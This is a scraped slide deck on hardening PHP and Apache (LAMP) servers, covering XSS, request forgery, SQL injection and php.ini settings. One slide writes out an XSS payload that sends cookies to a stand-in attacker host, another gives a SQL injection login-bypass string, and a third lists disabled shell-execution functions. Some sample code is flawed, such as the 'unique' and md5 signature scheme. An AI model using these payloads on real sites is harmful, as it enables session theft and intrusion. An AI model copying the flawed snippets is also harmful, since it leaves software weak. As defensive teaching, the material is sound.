How AI, OpenAI, and ChatGPT impact business and software.
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

LAMP security practices

  • 1. LAMP Security Practices XSS Request Forgeries SQL Injection Disable PHP, Apache, OS information Disable unnecessary modules Log PHP errors Disable/Limit file uploads DoS attack Remote Code execution Disable dangerous PHP functions Limit access to file system
  • 2. XSS A hacker posts the below given code snippet in the comment section of website http://exsite.com. Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" + document.cookie + "'>);</script> The code will load as it is whenever I will open the website http://exsite.com and will transfer my cookie data to hacker's site (http://evilhacker.org):- Note that cookie data may have my login credentials which you as a hacker can use to
  • 3. XSS solution All user submitted content should be filtered and all the disallowed characters should be removed In particular <, >, and all html tags should be stripped
  • 4. Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
  • 5. Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
  • 6. SQL Injection Ex. Input ' OR '1'='1 in userid field of login form. If server script for authentication uses “ Select * FROM tblusers WHERE userid = '$_GET['userid']' ”, this code will be interpolated to “ Select * FROM tblusers WHERE userid = '' OR '1'='1' ” which will result in valid records getting returned from database.
  • 7. SQL Injection Solution Use mysqli_real_escape_string($_GET['userid']) for all user supplied data Use prepared statements:- $statement = $connection->prepare( "SELECT * FROM tblusers WHERE userid = ?" ); $statement->bind_param( "i", $_GET['userid'] ); $statement->execute();
  • 8. Disable PHP information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 The output shows that the sites runs on PHP and the version of PHP as well Disable the information by setting expose_php=off in php.ini
  • 9. Disable Server Information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) The output shows Apache server, its version, and OS Ubuntu information Disable these information by setting ServerSignature Off ServerTokens Prod in /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
  • 10. Disable unnecessary modules Use php -m to check list of enabled modules Disable modules like gd if not required On Ubuntu, goto folder /etc/php5/conf.d Run: sudo mv gd.{ini,disable} This will rename file gd.ini to gd.disable and then the gd module will not be loaded with php
  • 11. Log PHP errors Use following to hide PHP error messages to be diaplayed to site users display_errors = Off Use following to log the PHP error messages into a log file log_errors = On error_log = /var/log/httpd/php-error.log For realtime monitoring of php error log use:- tail -f /var/log/httpd/php-error.log
  • 12. Disable File Uploads If your site doesnt want file upload functionality, remove it from php.ini :- file_uploads = Off If your site wants file upload functionality, set it to only the required minimum value :- file_upload = On upload_max_size = 1M
  • 13. DoS attack To avoid script taking an infinite time and bringing down the server, use following settings:- max_execution_time = 30 max_input_time = 30 memory_limit = 40M
  • 14. Remote Code Execution Remote urls can be opened by PHP functions like fopen, file_get_contents, include, require These remote urls are many time causes of code injection and data leakage when not filtered by programmers carefully. To restrict remote file opening:- allow_url_fopen = Off allow_url_include = Off
  • 15. Disable Dangerous PHP functions Use following directive to disable the php functions that are very powerful, dangerous and not normally required when PHP is running with a web server :- disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
  • 16. Limit Access to File System Use following to restrict PHP's access to parts of file system:- open_basedir="/var/www/html/" The above will not allow PHP access to parts of file system like /etc or /tmp etc.
  • 17. Session file path Session files must be saved away from the web site folder. Use following to change session files location:- session.save_path="/var/lib/php/session" upload_tmp_dir="/var/lib/php/upload"
  • 18. Write protect conf and application files Use chattr +i command to write protect any file chattr +i /etc/php5/php.ini chattr +i /etc/mysql/my.cnf chattr +i /etc/apache2/apache2.conf chattr +i /var/www/html/ Such files then can not be modified even by root user. Use chattr -i command to revert back the write protection
  • 19. Refrences http://php.net/manual/en/security.php http://developer.yahoo.com/security http://www.phpfreaks.com/tutorial/php-security http://phpsec.org/php-security-guide.pdf http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html